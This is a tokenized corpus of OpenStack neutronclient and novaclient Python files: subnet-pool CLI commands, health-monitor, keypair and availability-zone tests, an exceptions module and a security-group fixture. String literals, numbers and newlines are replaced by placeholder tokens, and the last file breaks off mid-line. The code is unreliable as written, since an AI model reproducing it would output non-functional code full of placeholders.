'<STR_LIT>' ) ) <EOL> utils . add_boolean_argument ( <EOL> parser , '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def updatable_args2body ( parsed_args , body ) : <EOL> neutronV20 . update_dict ( parsed_args , body , <EOL> [ '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:description>' ] ) <EOL> class ListSubnetPool ( neutronV20 . ListCommand ) : <EOL> """<STR_LIT>""" <EOL> _formatters = { '<STR_LIT>' : _format_prefixes , } <EOL> resource = '<STR_LIT>' <EOL> list_columns = [ '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> pagination_support = True <EOL> sorting_support = True <EOL> class ShowSubnetPool ( neutronV20 . ShowCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> class CreateSubnetPool ( neutronV20 . CreateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def add_known_arguments ( self , parser ) : <EOL> add_updatable_arguments ( parser , for_create = True ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT:name>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> parser . add_argument ( <EOL> '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def args2body ( self , parsed_args ) : <EOL> body = { '<STR_LIT>' : parsed_args . prefixes } <EOL> updatable_args2body ( parsed_args , body ) <EOL> if parsed_args . shared : <EOL> body [ '<STR_LIT>' ] = True <EOL> if parsed_args . address_scope : <EOL> _addrscope_id = neutronV20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . address_scope ) <EOL> body [ '<STR_LIT>' ] = _addrscope_id <EOL> return { '<STR_LIT>' : body } <EOL> class DeleteSubnetPool ( neutronV20 . DeleteCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> class UpdateSubnetPool ( neutronV20 . UpdateCommand ) : <EOL> """<STR_LIT>""" <EOL> resource = '<STR_LIT>' <EOL> def add_known_arguments ( self , parser ) : <EOL> add_updatable_arguments ( parser ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' ) ) <EOL> addrscope_args = parser . add_mutually_exclusive_group ( ) <EOL> addrscope_args . add_argument ( '<STR_LIT>' , <EOL> metavar = '<STR_LIT>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> addrscope_args . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> def args2body ( self , parsed_args ) : <EOL> body = { } <EOL> updatable_args2body ( parsed_args , body ) <EOL> if parsed_args . no_address_scope : <EOL> body [ '<STR_LIT>' ] = None <EOL> elif parsed_args . address_scope : <EOL> _addrscope_id = neutronV20 . find_resourceid_by_name_or_id ( <EOL> self . get_client ( ) , '<STR_LIT>' , <EOL> parsed_args . address_scope ) <EOL> body [ '<STR_LIT>' ] = _addrscope_id <EOL> return { '<STR_LIT>' : body } </s>
<s> import sys <EOL> from neutronclient . neutron . v2_0 . lb . v2 import healthmonitor <EOL> from neutronclient . tests . unit import test_cli20 <EOL> class CLITestV20LbHealthMonitorJSON ( test_cli20 . CLITestV20Base ) : <EOL> def test_create_healthmonitor_with_mandatory_params ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . CreateHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> my_id = '<STR_LIT>' <EOL> type = '<STR_LIT>' <EOL> max_retries = '<STR_LIT:3>' <EOL> delay = '<STR_LIT>' <EOL> timeout = '<STR_LIT>' <EOL> pool = '<STR_LIT>' <EOL> args = [ '<STR_LIT>' , type , '<STR_LIT>' , max_retries , <EOL> '<STR_LIT>' , delay , '<STR_LIT>' , timeout , '<STR_LIT>' , pool ] <EOL> position_names = [ '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> position_values = [ type , max_retries , delay , timeout , pool ] <EOL> self . _test_create_resource ( resource , cmd , '<STR_LIT>' , my_id , args , <EOL> position_names , position_values , <EOL> cmd_resource = cmd_resource ) <EOL> def test_create_healthmonitor_with_all_params ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . CreateHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> my_id = '<STR_LIT>' <EOL> type = '<STR_LIT>' <EOL> max_retries = '<STR_LIT:3>' <EOL> delay = '<STR_LIT>' <EOL> timeout = '<STR_LIT>' <EOL> http_method = '<STR_LIT:GET>' <EOL> expected_codes = '<STR_LIT>' <EOL> url_path = '<STR_LIT>' <EOL> pool = '<STR_LIT>' <EOL> name = '<STR_LIT>' <EOL> args = [ '<STR_LIT>' , '<STR_LIT>' , http_method , <EOL> '<STR_LIT>' , expected_codes , '<STR_LIT>' , url_path , <EOL> '<STR_LIT>' , type , '<STR_LIT>' , max_retries , <EOL> '<STR_LIT>' , delay , '<STR_LIT>' , timeout , '<STR_LIT>' , pool , <EOL> '<STR_LIT>' , name ] <EOL> position_names = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:type>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ] <EOL> position_values = [ False , http_method , expected_codes , url_path , <EOL> type , max_retries , delay , timeout , pool , name ] <EOL> self . _test_create_resource ( resource , cmd , '<STR_LIT>' , my_id , args , <EOL> position_names , position_values , <EOL> cmd_resource = cmd_resource ) <EOL> def test_list_healthmonitors ( self ) : <EOL> resources = '<STR_LIT>' <EOL> cmd_resources = '<STR_LIT>' <EOL> cmd = healthmonitor . ListHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , True , <EOL> cmd_resources = cmd_resources ) <EOL> def test_list_healthmonitors_pagination ( self ) : <EOL> resources = '<STR_LIT>' <EOL> cmd_resources = '<STR_LIT>' <EOL> cmd = healthmonitor . ListHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources_with_pagination ( resources , cmd , <EOL> cmd_resources = cmd_resources ) <EOL> def test_list_healthmonitors_sort ( self ) : <EOL> resources = '<STR_LIT>' <EOL> cmd_resources = '<STR_LIT>' <EOL> cmd = healthmonitor . ListHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , True , <EOL> cmd_resources = cmd_resources ) <EOL> def test_list_healthmonitors_limit ( self ) : <EOL> resources = '<STR_LIT>' <EOL> cmd_resources = '<STR_LIT>' <EOL> cmd = healthmonitor . ListHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , page_size = <NUM_LIT:1000> , <EOL> cmd_resources = cmd_resources ) <EOL> def test_show_healthmonitor_id ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . ShowHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> args = [ '<STR_LIT>' , '<STR_LIT:id>' , self . test_id ] <EOL> self . _test_show_resource ( resource , cmd , self . test_id , args , [ '<STR_LIT:id>' ] , <EOL> cmd_resource = cmd_resource ) <EOL> def test_show_healthmonitor_id_name ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . ShowHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> args = [ '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT:name>' , self . test_id ] <EOL> self . _test_show_resource ( resource , cmd , self . test_id , <EOL> args , [ '<STR_LIT:id>' , '<STR_LIT:name>' ] , <EOL> cmd_resource = cmd_resource ) <EOL> def _test_update_hm ( self , args , expected_values ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> my_id = '<STR_LIT>' <EOL> cmd = healthmonitor . UpdateHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> args . insert ( <NUM_LIT:0> , my_id ) <EOL> self . _test_update_resource ( resource , cmd , my_id , <EOL> args , <EOL> expected_values , <EOL> cmd_resource = cmd_resource ) <EOL> def test_update_healthmonitor ( self ) : <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , { '<STR_LIT:name>' : '<STR_LIT>' , } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT:5>' ] , { '<STR_LIT>' : '<STR_LIT:5>' , } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' , } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT:5>' ] , { '<STR_LIT>' : '<STR_LIT:5>' } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> self . _test_update_hm ( [ '<STR_LIT>' , '<STR_LIT:False>' ] , <EOL> { '<STR_LIT>' : '<STR_LIT:False>' } ) <EOL> def test_delete_healthmonitor ( self ) : <EOL> resource = '<STR_LIT>' <EOL> cmd_resource = '<STR_LIT>' <EOL> cmd = healthmonitor . DeleteHealthMonitor ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> my_id = '<STR_LIT>' <EOL> args = [ my_id ] <EOL> self . _test_delete_resource ( resource , cmd , my_id , args , <EOL> cmd_resource = cmd_resource ) </s>
<s> import sys <EOL> from neutronclient . neutron . v2_0 import servicetype <EOL> from neutronclient . tests . unit import test_cli20 <EOL> class CLITestV20ServiceProvidersJSON ( test_cli20 . CLITestV20Base ) : <EOL> id_field = "<STR_LIT:name>" <EOL> def setUp ( self ) : <EOL> super ( CLITestV20ServiceProvidersJSON , self ) . setUp ( <EOL> plurals = { '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def test_list_service_providers ( self ) : <EOL> resources = "<STR_LIT>" <EOL> cmd = servicetype . ListServiceProvider ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , True ) <EOL> def test_list_service_providers_pagination ( self ) : <EOL> resources = "<STR_LIT>" <EOL> cmd = servicetype . ListServiceProvider ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources_with_pagination ( resources , cmd ) <EOL> def test_list_service_providers_sort ( self ) : <EOL> resources = "<STR_LIT>" <EOL> cmd = servicetype . ListServiceProvider ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , <EOL> sort_key = [ "<STR_LIT:name>" ] , <EOL> sort_dir = [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> def test_list_service_providers_limit ( self ) : <EOL> resources = "<STR_LIT>" <EOL> cmd = servicetype . ListServiceProvider ( test_cli20 . MyApp ( sys . stdout ) , <EOL> None ) <EOL> self . _test_list_resources ( resources , cmd , page_size = <NUM_LIT:1000> ) </s>
<s> """<STR_LIT>""" <EOL> class UnsupportedVersion ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnsupportedAttribute ( AttributeError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , argument_name , start_version , end_version = None ) : <EOL> if end_version : <EOL> self . message = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % { "<STR_LIT:name>" : argument_name , <EOL> "<STR_LIT:start>" : start_version , <EOL> "<STR_LIT:end>" : end_version } ) <EOL> else : <EOL> self . message = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % { "<STR_LIT:name>" : argument_name , "<STR_LIT:start>" : start_version } ) <EOL> class CommandError ( Exception ) : <EOL> pass <EOL> class AuthorizationFailure ( Exception ) : <EOL> pass <EOL> class NoUniqueMatch ( Exception ) : <EOL> pass <EOL> class AuthSystemNotFound ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , auth_system ) : <EOL> self . auth_system = auth_system <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % repr ( self . auth_system ) <EOL> class NoTokenLookupException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class EndpointNotFound ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class AmbiguousEndpoints ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , endpoints = None ) : <EOL> self . endpoints = endpoints <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % repr ( self . endpoints ) <EOL> class ConnectionRefused ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , response = None ) : <EOL> self . response = response <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % repr ( self . response ) <EOL> class ResourceInErrorState ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , obj ) : <EOL> msg = "<STR_LIT>" % obj . __class__ . __name__ <EOL> fault_msg = getattr ( obj , "<STR_LIT>" , { } ) . get ( "<STR_LIT:message>" ) <EOL> if fault_msg : <EOL> msg += "<STR_LIT>" % fault_msg <EOL> self . message = "<STR_LIT>" % msg <EOL> class VersionNotFoundForAPIMethod ( Exception ) : <EOL> msg_fmt = "<STR_LIT>" <EOL> def __init__ ( self , version , method ) : <EOL> self . version = version <EOL> self . method = method <EOL> def __str__ ( self ) : <EOL> return self . msg_fmt % { "<STR_LIT>" : self . version , "<STR_LIT>" : self . method } <EOL> class InstanceInDeletedState ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ClientException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> message = '<STR_LIT>' <EOL> def __init__ ( self , code , message = None , details = None , request_id = None , <EOL> url = None , method = None ) : <EOL> self . code = code <EOL> self . message = message or self . __class__ . message <EOL> self . details = details <EOL> self . request_id = request_id <EOL> self . url = url <EOL> self . method = method <EOL> def __str__ ( self ) : <EOL> formatted_string = "<STR_LIT>" % ( self . message , self . code ) <EOL> if self . request_id : <EOL> formatted_string += "<STR_LIT>" % self . request_id <EOL> return formatted_string <EOL> class RetryAfterException ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> try : <EOL> self . retry_after = int ( kwargs . pop ( '<STR_LIT>' ) ) <EOL> except ( KeyError , ValueError ) : <EOL> self . retry_after = <NUM_LIT:0> <EOL> super ( RetryAfterException , self ) . __init__ ( * args , ** kwargs ) <EOL> class BadRequest ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class Unauthorized ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class Forbidden ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class NotFound ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class MethodNotAllowed ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class NotAcceptable ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class Conflict ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class OverLimit ( RetryAfterException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class RateLimit ( RetryAfterException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> class HTTPNotImplemented ( ClientException ) : <EOL> """<STR_LIT>""" <EOL> http_status = <NUM_LIT> <EOL> message = "<STR_LIT>" <EOL> _error_classes = [ BadRequest , Unauthorized , Forbidden , NotFound , <EOL> MethodNotAllowed , NotAcceptable , Conflict , OverLimit , <EOL> RateLimit , HTTPNotImplemented ] <EOL> _code_map = dict ( ( c . http_status , c ) for c in _error_classes ) <EOL> class InvalidUsage ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def from_response ( response , body , url , method = None ) : <EOL> """<STR_LIT>""" <EOL> cls = _code_map . get ( response . status_code , ClientException ) <EOL> kwargs = { <EOL> '<STR_LIT:code>' : response . status_code , <EOL> '<STR_LIT>' : method , <EOL> '<STR_LIT:url>' : url , <EOL> '<STR_LIT>' : None , <EOL> } <EOL> if response . headers : <EOL> kwargs [ '<STR_LIT>' ] = response . headers . get ( '<STR_LIT>' ) <EOL> if ( issubclass ( cls , RetryAfterException ) and <EOL> '<STR_LIT>' in response . headers ) : <EOL> kwargs [ '<STR_LIT>' ] = response . headers . get ( '<STR_LIT>' ) <EOL> if body : <EOL> message = "<STR_LIT>" <EOL> details = "<STR_LIT>" <EOL> if hasattr ( body , '<STR_LIT>' ) : <EOL> if '<STR_LIT:message>' in body : <EOL> message = body . get ( '<STR_LIT:message>' ) <EOL> details = body . get ( '<STR_LIT>' ) <EOL> else : <EOL> error = body [ list ( body ) [ <NUM_LIT:0> ] ] <EOL> message = error . get ( '<STR_LIT:message>' ) <EOL> details = error . get ( '<STR_LIT>' ) <EOL> kwargs [ '<STR_LIT:message>' ] = message <EOL> kwargs [ '<STR_LIT>' ] = details <EOL> return cls ( ** kwargs ) <EOL> class ResourceNotFound ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> from novaclient . tests . functional import base <EOL> from novaclient . tests . functional . v2 import fake_crypto <EOL> from novaclient . tests . functional . v2 . legacy import test_keypairs <EOL> class TestKeypairsNovaClientV22 ( test_keypairs . TestKeypairsNovaClient ) : <EOL> """<STR_LIT>""" <EOL> COMPUTE_API_VERSION = "<STR_LIT>" <EOL> def test_create_keypair ( self ) : <EOL> keypair = super ( TestKeypairsNovaClientV22 , self ) . test_create_keypair ( ) <EOL> self . assertIn ( '<STR_LIT>' , keypair ) <EOL> def test_create_keypair_x509 ( self ) : <EOL> key_name = self . _create_keypair ( key_type = '<STR_LIT>' ) <EOL> keypair = self . _show_keypair ( key_name ) <EOL> self . assertIn ( key_name , keypair ) <EOL> self . assertIn ( '<STR_LIT>' , keypair ) <EOL> def test_import_keypair ( self ) : <EOL> pub_key , fingerprint = fake_crypto . get_ssh_pub_key_and_fingerprint ( ) <EOL> pub_key_file = self . _create_public_key_file ( pub_key ) <EOL> keypair = self . _test_import_keypair ( fingerprint , pub_key = pub_key_file ) <EOL> self . assertIn ( '<STR_LIT>' , keypair ) <EOL> def test_import_keypair_x509 ( self ) : <EOL> certif , fingerprint = fake_crypto . get_x509_cert_and_fingerprint ( ) <EOL> pub_key_file = self . _create_public_key_file ( certif ) <EOL> keypair = self . _test_import_keypair ( fingerprint , key_type = '<STR_LIT>' , <EOL> pub_key = pub_key_file ) <EOL> self . assertIn ( '<STR_LIT>' , keypair ) <EOL> class TestKeypairsNovaClientV210 ( base . TenantTestBase ) : <EOL> """<STR_LIT>""" <EOL> COMPUTE_API_VERSION = "<STR_LIT>" <EOL> def test_create_and_list_keypair ( self ) : <EOL> name = self . name_generate ( "<STR_LIT>" ) <EOL> self . nova ( "<STR_LIT>" % ( name , self . user_id ) ) <EOL> self . addCleanup ( self . another_nova , "<STR_LIT>" % name ) <EOL> output = self . nova ( "<STR_LIT>" ) <EOL> self . assertRaises ( ValueError , self . _get_value_from_the_table , <EOL> output , name ) <EOL> output_1 = self . another_nova ( "<STR_LIT>" ) <EOL> output_2 = self . nova ( "<STR_LIT>" % self . user_id ) <EOL> self . assertEqual ( output_1 , output_2 ) <EOL> self . assertEqual ( name , self . _get_column_value_from_single_row_table ( <EOL> output_1 , "<STR_LIT:Name>" ) ) <EOL> output_1 = self . another_nova ( "<STR_LIT>" % name ) <EOL> output_2 = self . nova ( "<STR_LIT>" % ( self . user_id , <EOL> name ) ) <EOL> self . assertEqual ( output_1 , output_2 ) <EOL> self . assertEqual ( self . user_id , <EOL> self . _get_value_from_the_table ( output_1 , "<STR_LIT>" ) ) <EOL> def test_create_and_delete ( self ) : <EOL> name = self . name_generate ( "<STR_LIT>" ) <EOL> def cleanup ( ) : <EOL> o = self . another_nova ( "<STR_LIT>" ) <EOL> if name in o : <EOL> self . another_nova ( "<STR_LIT>" % name ) <EOL> self . nova ( "<STR_LIT>" % ( name , self . user_id ) ) <EOL> self . addCleanup ( cleanup ) <EOL> output = self . another_nova ( "<STR_LIT>" ) <EOL> self . assertEqual ( name , self . _get_column_value_from_single_row_table ( <EOL> output , "<STR_LIT:Name>" ) ) <EOL> self . nova ( "<STR_LIT>" % ( name , self . user_id ) ) <EOL> output = self . another_nova ( "<STR_LIT>" ) <EOL> self . assertRaises ( <EOL> ValueError , <EOL> self . _get_column_value_from_single_row_table , output , "<STR_LIT:Name>" ) </s>
<s> from oslo_serialization import jsonutils <EOL> from novaclient . tests . unit import fakes <EOL> from novaclient . tests . unit . fixture_data import base <EOL> class Fixture ( base . Fixture ) : <EOL> base_url = '<STR_LIT>' <EOL> def setUp ( self ) : <EOL> super ( Fixture , self ) . setUp ( ) <EOL> security_group_1 = { <EOL> "<STR_LIT:name>" : "<STR_LIT:test>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:id>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:id>" : <NUM_LIT:11> , <EOL> "<STR_LIT>" : { } , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } <EOL> } , <EOL> { <EOL> "<STR_LIT:id>" : <NUM_LIT:12> , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:name>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : { } <EOL> } <EOL> ] <EOL> } <EOL> security_group_2 = { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT:description>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:id>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : [ ] <EOL> } <EOL> get_groups = { '<STR_LIT>' : [ security_group_1 , security_group_2 ] } <EOL> headers = self . json_headers <EOL> self . requests . register_uri ( '<STR_LIT:GET>' , self . url ( ) , <EOL> json = get_groups , <EOL> headers = headers ) <EOL> get_group_1 = { '<STR_LIT>' : security_group_1 } <EOL> self . requests . register_uri ( '<STR_LIT:GET>' , self . url ( <NUM_LIT:1> ) , <EOL> json = get_group_1 , <EOL> headers = headers ) <EOL> self . requests . register_uri ( '<STR_LIT>' , self . url ( <NUM_LIT:1> ) , status_code = <NUM_LIT> , <EOL> headers = headers ) <EOL> def post_os_security_groups ( request , context ) : <EOL> body = jsonutils . loads ( request . body ) <EOL> assert list ( body ) == [ '<STR_LIT>' ] <EOL> fakes . assert_has_keys ( body [ '<STR_LIT>' ] , <EOL> required = [ '<STR_LIT:name>' , '<STR_LIT:description>' ] ) <EOL> return { '<STR_LIT>' : security_group_1 } <EOL> self . requests . register_uri ( '<STR_LIT:POST>' , self . url ( ) , <EOL> json = post_os_security_groups , <EOL> headers = headers , <EOL> status_code = <NUM_LIT> ) <EOL> def put_os_security_groups_1 ( request , context ) : <EOL> body = jsonutils . loads ( request . body ) <EOL> assert list ( body ) == [ '<STR_LIT>' ] <EOL> fakes . assert_has_keys ( body [ '<STR_LIT>' ] , <EOL> required = [ '<STR_LIT:name>' , '<STR_LIT:description>' ] ) <EOL> return body <EOL> self . requests . register_uri ( '<STR_LIT>' , self . url ( <NUM_LIT:1> ) , <EOL> json = put_os_security_groups_1 , <EOL> headers = headers , <EOL> status_code = <NUM_LIT> ) </s>
<s> import six <EOL> from novaclient . tests . unit . fixture_data import availability_zones as data <EOL> from novaclient . tests . unit . fixture_data import client <EOL> from novaclient . tests . unit import utils <EOL> from novaclient . tests . unit . v2 import fakes <EOL> from novaclient . v2 import availability_zones <EOL> class AvailabilityZoneTest ( utils . FixturedTestCase ) : <EOL> from novaclient . v2 import shell <EOL> data_fixture_class = data . V1 <EOL> scenarios = [ ( '<STR_LIT>' , { '<STR_LIT>' : client . V1 } ) , <EOL> ( '<STR_LIT>' , { '<STR_LIT>' : client . SessionV1 } ) ] <EOL> def setUp ( self ) : <EOL> super ( AvailabilityZoneTest , self ) . setUp ( ) <EOL> self . availability_zone_type = self . _get_availability_zone_type ( ) <EOL> def _get_availability_zone_type ( self ) : <EOL> return availability_zones . AvailabilityZone <EOL> def _assertZone ( self , zone , name , status ) : <EOL> self . assertEqual ( zone . zoneName , name ) <EOL> self . assertEqual ( zone . zoneState , status ) <EOL> def test_list_availability_zone ( self ) : <EOL> zones = self . cs . availability_zones . list ( detailed = False ) <EOL> self . assert_request_id ( zones , fakes . FAKE_REQUEST_ID_LIST ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> for zone in zones : <EOL> self . assertIsInstance ( zone , self . availability_zone_type ) <EOL> self . assertEqual ( <NUM_LIT:2> , len ( zones ) ) <EOL> l0 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l1 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> z0 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:0> ] ) <EOL> z1 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( len ( z0 ) , len ( z1 ) ) ) <EOL> self . _assertZone ( z0 [ <NUM_LIT:0> ] , l0 [ <NUM_LIT:0> ] , l0 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z1 [ <NUM_LIT:0> ] , l1 [ <NUM_LIT:0> ] , l1 [ <NUM_LIT:1> ] ) <EOL> def test_detail_availability_zone ( self ) : <EOL> zones = self . cs . availability_zones . list ( detailed = True ) <EOL> self . assert_request_id ( zones , fakes . FAKE_REQUEST_ID_LIST ) <EOL> self . assert_called ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> for zone in zones : <EOL> self . assertIsInstance ( zone , self . availability_zone_type ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( zones ) ) <EOL> l0 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l1 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l2 = [ six . u ( '<STR_LIT>' ) , <EOL> six . u ( '<STR_LIT>' ) ] <EOL> l3 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l4 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l5 = [ six . u ( '<STR_LIT>' ) , <EOL> six . u ( '<STR_LIT>' ) ] <EOL> l6 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> l7 = [ six . u ( '<STR_LIT>' ) , <EOL> six . u ( '<STR_LIT>' ) ] <EOL> l8 = [ six . u ( '<STR_LIT>' ) , six . u ( '<STR_LIT>' ) ] <EOL> z0 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:0> ] ) <EOL> z1 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:1> ] ) <EOL> z2 = self . shell . _treeizeAvailabilityZone ( zones [ <NUM_LIT:2> ] ) <EOL> self . assertEqual ( ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:1> ) , ( len ( z0 ) , len ( z1 ) , len ( z2 ) ) ) <EOL> self . _assertZone ( z0 [ <NUM_LIT:0> ] , l0 [ <NUM_LIT:0> ] , l0 [ <NUM_LIT:1> ] ) <EOL> self . _assertZone ( z0 [ <NUM_LIT:1> 